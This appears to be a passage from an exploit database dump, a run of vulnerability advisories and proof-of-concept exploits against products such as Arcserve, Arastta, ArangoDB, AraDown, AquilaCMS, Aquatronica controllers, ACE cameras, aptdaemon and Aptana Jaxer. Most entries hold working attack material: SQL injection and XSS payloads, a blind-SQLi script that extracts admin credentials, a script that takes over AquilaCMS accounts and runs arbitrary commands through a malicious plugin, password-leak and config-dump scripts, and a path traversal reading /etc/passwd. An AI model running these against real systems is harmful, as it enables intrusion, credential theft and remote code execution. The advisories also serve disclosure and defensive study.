This should be: "C:\Program Files\Arcserve\Unified Data Protection\Update Manager\ARCUpdate.exe"
Step 2: Assess if exploitation is possible
To exploit this issue assess the permissions of each folder in the path using space as a token.
If any of the directories is writable for a non-administrative user, try to exploit the issue.
Step 3 Exploitation:
Place a binary with the correct name in the vulnerable directory.
Reboot the system and validate your payload is executed with SYSTEM privileges
- 4. Vendor Mitigation: -
Create an update for the product which add quotes to the path.
While the update is being developed customers could apply a manual fix:
Open regedit, browse to HKLM\SYSTEM\CurrentControlSet\services
Add quotes to the ImagePath value of the relevant service.
- 5. End-user Mitigation: -
A patch has been released by Arcserve.
All customer should upgrade to the latest version as described in the release notes:
http://documentation.arcserve.com/Arcserve-UDP/Available/V6/ENU/Bookshelf_Files/HTML/Update3/Default.htm#Update3/upd3_Issues_Fixed.htm%3FTocPath%3D_____6
- 6. Author: -
sh4d0wman / Herman Groeneveld
herman_worldwide AT hotmail. com
- 7. Timeline: -
* 01/06/2016: Vulnerability discovery
* 18/06/2016: Request sent to info@arcserve.com for a security point-of-contact
* 21/06/2016: Received contact but no secure channel. Requested confirmation to send PoC over unsecure channel
* 22/06/2016: vendor supplied PGP key, vulnerability PoC sent
* 09/07/2016: Received information: 2 out of 3 issues have fixes pending.
Vendor requests additional mitigation techniques for the third issue.
* 13/07/2016: Sent vendor various mitigation solutions and their limitations.
* 13/08/2016: Vendor informs release is pending for all discovered issues.
* 15/08/2016: Vendor requests text for release bulletin.
* 19/08/2016: A fix has been released.
# Exploit Title: Archeevo 5.0 - Local File Inclusion
# Google Dork: intitle:"archeevo"
# Date: 01/15/2021
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.keep.pt/
# Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/
# Version: < 5.0
# Tested on: windows
# 1. Description
Unauthenticated user can exploit LFI vulnerability in file parameter.
# 2. Proof of Concept (PoC)
Access a page that don’t exist like /test.aspx and then you will be redirected to
https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html
After that change the file /FileNotFoundPage.html to /web.config and you be able to see the
/web.config file of the application.
https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config
# 3. Research:
https://miguelsantareno.github.io/MoD_1.pdf
source: https://www.securityfocus.com/bid/52881/info
Peakflow SP is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
https://www.example.com/index/"onmouseover="alert(666)
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Arastta 1.1.5
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://arastta.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Arastta is an eCommerce software written in PHP. In version 1.1.5, it is
vulnerable to two SQL injection vulnerabilities, one normal injection when
searching for products via tags, and one blind injection via the language
setting. Both of them require a user with special privileges to trigger.
3. SQL Injection 1
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
There is an SQL Injection when retrieving products.
Currently, only the "filter" variable is vulnerable. Note that the "tag_name"
variable would also be vulnerable to SQL injection, if there wasn't a filter
that forbid single quotes in the URL. As defense in depth, it might be a good
idea to sanitize that value here as well.
Note that an account with the right "Catalog -> Filters" is needed to exploit
this issue.
Proof of Concept
POST /Arastta/admin/index.php?route=catalog/product/autocomplete&token=3d6cfa8f9f602a4f47e0dfbdb989a469&filter_name=a&tag_name= HTTP/1.1
tag_text[][value]=abc') union all select password from gv4_user -- -
Code
/admin/model/catalog/product.php
public function getTags($tag_name, $filter_tags = null) {
[...]
$query = $this->db->query("SELECT DISTINCT(tag) FROM `" . DB_PREFIX . "product_description` WHERE `tag` LIKE '%" . $tag_name . "%'" . $filter);
/admin/controller/catalog/product.php
public function autocomplete() {
[...]
if (isset($this->request->get['tag_name'])) {
$this->load->model('catalog/product');
if (isset($this->request->get['tag_name'])) {
$tag_name = $this->request->get['tag_name'];
} else {
$tag_name = '';
}
$filter = null;
if(isset($this->request->post['tag_text'])) {
$filter = $this->request->post['tag_text'];
}
$results = $this->model_catalog_product->getTags($tag_name, $filter);
foreach ($results as $result) {
$json[] = array(
'tag' => $result,
'tag_id' => $result
);
}
}
4. SQL Injection 2
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
There is a second order timing based SQL injection when choosing the language
setting.
An admin account with the right "Setting -> Setting" is needed to exploit this
issue.
Alternatively, a user with the right "Localisation -> Languages" can inject a
payload as well. However, a user with the right "Setting -> Setting" is still
needed to choose the malicious language to trigger the payload.
Proof of Concept
Visit the setting page:
http://localhost/Arastta/admin/index.php?route=setting/setting
For the config_language and config_admin_language parameters use:
en' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) -- -
Visiting any site will trigger the injected code.
Code
/Arastta/system/library/utility.php
public function getDefaultLanguage(){
if (!is_object($this->config)) {
return;
}
$store_id = $this->config->get('config_store_id');
if (Client::isAdmin()){
$sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_admin_language' AND `store_id` = '" . $store_id . "'";
} else {
$sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_language' AND `store_id` = '" . $store_id . "'";
}
$query = $this->db->query($sql);
$code = $query->row['value'];
$language = $this->db->query("SELECT * FROM " . DB_PREFIX . "language WHERE `code` = '" . $code . "'");
return $language->row;
}
5. Solution
This issue was not fixed by the vendor.
6. Report Timeline
11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/17/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Arastta-115-SQL-Injection-131.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
##################################################################################################################################
# Exploit Title: ArangoDB Community Edition 3.4.2-1 | Cross-Site Scripting
# Date: 17.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.arangodb.com
# Software Link: https://www.arangodb.com/download-major/
# Version: 3.4.2-1
##################################################################################################################################
Introduction
ArangoDB is a native multi-model, open-source database with flexible data
models for documents, graphs, and key-values. Build high performance
applications using a convenient SQL-like query language or JavaScript
extensions. Use ACID transactions if you require them. Scale horizontally
and vertically with a few mouse clicks.
#################################################################################
XSS details: DOM Based & Reflected & Stored
#################################################################################
XSS1 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#views
PAYLOAD
"><script>alert(1)</script>
<div class="search-field">
<input type="text" value=""><script>alert(1)</script>"
id="viewsSearchInput" class="search-input" placeholder="Search..."/>
<i id="viewsSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
XSS2 | Reflected & Stored - Save as
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root
METHOD
PATCH
PARAMETER
name
PAYLOAD
"><script>alert(2)</script>
#################################################################################
XSS3 | Stored - Delete query
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root
METHOD
Get
#################################################################################
XSS3 | Reflected & Stored - Add User
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
http://127.0.0.1:8529/_db/_system/_api/user
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#user/%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E
METHOD
Post
PARAMETER
user,name
PAYLOAD
"><script>alert(3)</script>
"><script>alert(4)</script>
#################################################################################
XSS5 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
PAYLOAD
"><script>alert(5)</script>
<div class="search-field">
<input type="text" value=""><script>alert(5)</script>"
id="userManagementSearchInput" class="search-input"
placeholder="Search..."/>
<!-- <img id="userManagementSearchSubmit" class="search-submit-icon">
-->
<i id="userManagementSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
XSS6 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#databases
PAYLOAD
"><script>alert(6)</script>
<div class="search-field">
<input type="text" value=""><script>alert(6)</script>"
id="databaseSearchInput" class="search-input" placeholder="Search..."/>
<!-- <img id="databaseSearchSubmit" class="search-submit-icon">-->
<i id="databaseSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
source: https://www.securityfocus.com/bid/54891/info
AraDown is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
<?php
echo "
_____ _ _ _____ _____ _______
/ ___| | | | | / _ \ / ___/|__ __|
| | _ | |__| | | | | | | |___ | |
| | | | | __ | | | | | \___ \ | |
| |_| | | | | | | |_| | ___| | | |
\_____/ |_| |_| \_____/ /_____/ |_|
____ _ _____ _____ _____ ___ ___
| _ \ | | / _ \ / _ \ | _ \ \ \ / /
| |_) | | | | | | | | | | | | | | \ \ \/ /
| _ ( | | | | | | | | | | | | | | \ /
| |_) | | |___ | |_| | | |_| | | |_| / | |
|____/ |_____| \_____/ \_____/ |_____/ |__|
[*]-----------------------------------------------------------------------[*]
# Exploit Title : ArDown (All Version) <- Remote Blind SQL Injection
# Google Dork : 'powered by AraDown'
# Date : 08/07/2012
# Exploit Author : G-B
# Email : g22b@hotmail.com
# Software Link : http://aradown.info/
# Version : All Version
[*]-----------------------------------------------------------------------[*]
[*] Target -> ";
$target = stdin();
$ar = array('1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
echo "[*] Username : ";
for($i=1;$i<=30;$i++){
foreach($ar as $char){
$b = send('http://server',"3' and (select substr(username,$i,1) from aradown_admin)='$char' # ");
if(eregi('<span class="on_img" align="center"></span>',$b) && $char == 'z'){
$i = 50;
break;
}
if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
echo $char;
break;
}
}
echo "\n[*] Password : ";
for($i=1;$i<=32;$i++){
foreach($ar as $char){
$b = send('http://server',"3' and (select substr(password,$i,1) from aradown_admin)='$char' # ");
if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
echo $char;
break;
}
}
function send($target,$query){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"$target/ajax_like.php");
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,array('id'=>$query));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$r = curl_exec($ch);
curl_close($ch);
return $r;
}
function stdin(){
$fp = fopen("php://stdin","r");
$line = trim(fgets($fp));
fclose($fp);
return $line;
}
?>
## In The Name Of ALLAH ##
# title : Arabportal 3 SQL injection vulnerability
# Exploit Title: Arabportal 3 registeration section SQL injection vulnerability
# Google Dork: inurl:members.php?action=signup
# Date: 2015/07/10 (july 10th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: www.arabportal.net
# Software Link: www.arabportal.net
# Version: 3
# Tested on: linux
# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1
members.php?action=singup
POST parameter "showemail" is vulnerable to error based SQLi attack
................................................................................
1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady
video : https://youtu.be/5nFblYE90Vk
good luck
source: https://www.securityfocus.com/bid/56465/info
AWCM is prone to an authentication-bypass and multiple security-bypass vulnerabilities.
Attackers can exploit these vulnerabilities to bypass certain security restrictions, perform unauthorized actions; which may aid in further attacks.
AWCM 2.2 is vulnerable; other versions may also be affected.
Authentication Bypass:
http://www.example.com/awcm/cookie_gen.php?name=\'key\'&content=\'value\'
ex) http://targethost/awcm/cookie_gen.php?
name=awcm_member&content=123456
Security Bypass:
[form action=\"http://www.example.com/awcm/show_video.php?coment=exploit\"
method=\"post\"]
[input type=\"hidden\" name=\"coment\" value=\'insert
uninvited comments 2\' /]
[input type=\"submit\" value=\"Submit\"]
</form>
# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE)
# Date: 2024-10-25
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.aquila-cms.com/
# Software Link: https://github.com/AquilaCMS/AquilaCMS
# Version: v1.409.20
# CVE: CVE-2024-48572, CVE-2024-48573
import io
import json
import uuid
import string
import zipfile
import argparse
import requests
import textwrap
def unescape_special_characters(email):
return (
email.replace("[$]", "$")
.replace("[*]", "*")
.replace("[+]", "+")
.replace("[-]", "-")
.replace("[.]", ".")
.replace("[?]", "?")
.replace(r"[\^]", "^")
.replace("[|]", "|")
)
def get_user_emails():
valid_characters = list(
string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]
emails_found = []
next_emails = ["^"]
while next_emails:
prev_emails = next_emails
next_emails = []
for email in prev_emails:
found = False
for ch in valid_characters:
data = {"email": f"{email + ch}.*"}
res = requests.put(f"{args.url}/api/v2/user", json=data)
if json.loads(res.text)["code"] == "UserAlreadyExist":
next_emails.append(email + ch)
found = True
if not found:
emails_found.append(email[1:])
print(f"[+] {unescape_special_characters(email[1:])}")
return emails_found
def reset_password(email):
data = {"email": email}
requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
data = {"token": {"$ne": None}, "password": args.password}
requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
print(f"[+] {unescape_special_characters(email)} : {args.password}")
def get_admin_auth_token(emails):
for email in emails:
data = {"username": email, "password": args.password}
res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)
if res.status_code == 200:
print(f"[+] Administrator account : {unescape_special_characters(email)}")
return json.loads(res.text)["data"]
return None
def create_plugin(plugin_name):
payload = textwrap.dedent(
f"""
const {{ exec }} = require("child_process");
/**
* This function is called when the plugin is desactivated or when we delete it
*/
module.exports = async function (resolve, reject) {{
try {{
exec("{args.command}");
return resolve();
}} catch (error) {{}}
}};
"""
).strip()
plugin = io.BytesIO()
with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
zip_file.writestr(
f"{plugin_name}/package.json",
io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
)
zip_file.writestr(
f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
)
zip_file.writestr(
f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
)
plugin.seek(0)
return plugin
def rce(emails):
auth_token = get_admin_auth_token(emails)
if auth_token is None:
print("[-] Administrator account not found")
return
print("[+] Create malicious plugin")
plugin_name = uuid.uuid4().hex
plugin = create_plugin(plugin_name)
print("[+] Upload plugin")
headers = {"Authorization": auth_token}
files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)
print("[+] Find uploaded plugin")
headers = {"Authorization": auth_token}
data = {"PostBody": {"limit": 0}}
res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)
plugin_id = None
for data in json.loads(res.text)["datas"]:
if data["name"] == plugin_name:
plugin_id = data["_id"]
print(f"[+] Plugin ID : {plugin_id}")
break
if plugin_id is None:
print("[-] Plugin not found")
return
print("[+] Deactivate plugin")
headers = {"Authorization": auth_token}
data = {"idModule": plugin_id, "active": False}
res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)
if res.status_code == 200:
print("[+] Command execution succeeded")
else:
print("[-] Command execution failed")
def main():
print("[*] Retrieve email addresses")
emails = get_user_emails()
print("\n[*] Reset password")
for email in emails:
reset_password(email)
print("\n[*] Perform remote code execution")
rce(emails)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-u",
dest="url",
help="Site URL (e.g. www.aquila-cms.com)",
type=str,
required=True,
)
parser.add_argument(
"-p",
dest="password",
help="Password to use for password reset (e.g. HaXX0r3d!)",
type=str,
default="HaXX0r3d!",
)
parser.add_argument(
"-c",
dest="command",
help="Command to execute (e.g. touch /tmp/pwned)",
type=str,
default="touch /tmp/pwned",
)
args = parser.parse_args()
main()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# Aquatronica Control System 5.1.6 Passwords Leak Vulnerability
#
#
# Vendor: Aquatronica s.r.l.
# Product web page: https://www.aquatronica.com
# Affected version: Firmware: 5.1.6
# Web: 2.0
#
# Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy
# to use, allowing you to control all the electrical devices in
# an aquarium and to monitor all their parameters; it can be used
# for soft water aquariums, salt water aquariums or both simultaneously.
#
# Desc: The tcp.php endpoint on the Aquatronica controller is exposed
# to unauthenticated attackers over the network. This vulnerability
# allows remote attackers to send a POST request which can reveal
# sensitive configuration information, including plaintext passwords.
# This can lead to unauthorized access and control over the aquarium
# controller, compromising its security and potentially allowing attackers
# to manipulate its settings.
#
# Tested on: Apache/2.0.54 (Unix)
# PHP/5.4.17
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2024-5824
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
#
#
# 04.05.2024
#
import requests, html, re, sys, time
from urllib.parse import unquote
program = "TCP"
command = "ws_get_network_cfg"
function_id = "TCP_XML_REQUEST"
print("""
_________ . .
(.. \_ , |\ /|
\ O \ /| \ \/ /
\______ \/ | \ /
vvvv\ \ | / |
\^^^^ == \_/ |
`\_ === \. |
/ /\_ \ / |
|/ \_ \| /
___ ______________\________/________aquatronica_0day___
| |
| |
| |
""")
if len(sys.argv) != 2:
print("Usage: python aqua.py <ip:port>")
sys.exit(1)
ip = sys.argv[1]
url = f"http://{ip}/{program.lower()}.php"
post_data = {'function_id' : function_id.lower(),
'command' : command.upper()}
r = requests.post(url, data=post_data)
if r.status_code == 200:
r_d = unquote(r.text)
f_d_r = html.unescape(r_d)
regex = r'pwd="([^"]+)"'
rain = re.findall(regex, f_d_r)
for drops in rain:
print(' ',drops)
time.sleep(0.5)
else:
print(f"Dry season! {r.status_code}")
# Exploit Title: Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure
# Author: Todor Donev
# Date: 2020-02-23
# Vendor: https://acesecurity.jp
# Product Link: https://acesecurity.jp/support/top/wip_series/wip-90113
# CVE: N/A
#!/usr/bin/perl
#
# ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure
#
# Copyright 2020 (c) Todor Donev
#
# https://donev.eu/
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# [ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure
# [ ================================================================
# [ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
# [ Initializing the browser
# [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
# [ >> Content-Type => application/x-www-form-urlencoded
# [ << Connection => close
# [ << Date => Sat, 22 Feb 2020 14:10:01 GMT
# [ << Accept-Ranges => bytes
# [ << Server => thttpd/2.25b 29dec2003
# [ << Content-Length => 25893
# [ << Content-Type => application/octet-stream
# [ << Last-Modified => Sat, 22 Feb 2020 14:10:00 GMT
# [ << Client-Date => Sat, 22 Feb 2020 14:10:04 GMT
# [ << Client-Peer => 192.168.200.49:8080
# [ << Client-Response-Num => 1
# [
# [ Username : admin
# [ Password : admin
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';
my $host = shift || ''; # Full path url to the store
my $cmd = shift || ''; # show - Show configuration dump
$host =~ s/\/$//;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\n";
print "[ ================================================================\n";
print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/){
print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
exit;
}
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
# my $target = $host."/config_backup.bin";
# my $target = $host."/tmpfs/config_backup.bin";
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print "[ \n";
if ($cmd =~ /show/) {
print "[ >> Configuration dump...\n[\n";
print "[ ", $_, "\n" for split(/\n/,$config);
exit;
} else {
print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
exit;
}
# Exploit Title: File Existence Disclosure in aptdaemon <= 1.1.1+bzr982-0ubuntu32.1
# Date: 2020-10-27
# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)
# Vendor Homepage: https://wiki.debian.org/aptdaemon
# Software Link: https://wiki.debian.org/aptdaemon
# Version: <= 1.1.1+bzr982-0ubuntu32.1
# Tested on: Ubuntu 20.04
#
#!/usr/bin/env python3
#
# Ubuntu 16.04 - 20.04
# Debian 9 - 11
# aptdaemon < 1.1.1+bzr982-0ubuntu32.1
# Sensitive Information Disclosure
#
# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html
#
# There is no input validation on the Locale property in an
# apt transaction. An unprivileged user can supply a full path
# to a writable directory, which lets aptd read a file as root.
# Having a symlink in place results in an error message if the
# file exists, and no error otherwise. This way an unprivileged
# user can check for the existence of any files on the system
# as root.
#
# This is a similar type of bug as CVE-2015-1323.
#
#
# $ ./test_file_exists.py /root/.bashrc
# File Exists!
# $ ./test_file_exists.py /root/.bashrca
# File does not exist!
#
#
import dbus
import os
import sys
if len(sys.argv) != 2:
print("Checks if file exists")
print("Usage: %s <file>")
sys.exit(0)
FILE_TO_CHECK = sys.argv[1]
bus = dbus.SystemBus()
apt_dbus_object = bus.get_object("org.debian.apt", "/org/debian/apt")
apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.debian.apt")
# just use any valid .deb file
trans = apt_dbus_interface.InstallFile("/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb", False)
apt_trans_dbus_object = bus.get_object("org.debian.apt", trans)
apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.debian.apt.transaction")
properties_manager = dbus.Interface(apt_trans_dbus_interface, 'org.freedesktop.DBus.Properties')
os.mkdir("/tmp/a")
os.mkdir("/tmp/a/LC_MESSAGES")
os.symlink(FILE_TO_CHECK, "/tmp/a/LC_MESSAGES/aptdaemon.mo")
try:
properties_manager.Set("org.debian.apt.transaction", "Locale", "/tmp/a.")
except:
print("File Exists!")
pass
else:
print("File does not exist!")
os.unlink("/tmp/a/LC_MESSAGES/aptdaemon.mo")
os.rmdir("/tmp/a/LC_MESSAGES")
os.rmdir("/tmp/a")
# Exploit Title: Aptana Jaxer Remote Local File inclusion
# Date: 8/8/2019
# Exploit Author: Steph Jensen
# Vendor Homepage:
[http://www.jaxer.org](http://www.jaxer.org/category/uncategorized/)
# Version: 1.0.3.4547
# Tested on: Linux
# CVE : CVE-2019-14312
Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via tools/sourceViewer/index.html?filename=../ URI.
To exploit this vulnerability an attacker must have access to the Aptana Jaxer web application. The Samples and Tools page will have the wikilite demo. After opening the wikilite demo the source code can be viewed by clicking the html button and selecting "Wikilite source code". This leads to http://server:8081/aptana/tools/sourceViewer/index.html?filename=../../samples/wikilite/index.html. by using directory traversal in the filename parameter a remote attacker can access internal files on the server.
PoC: http://server:8081/aptana/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd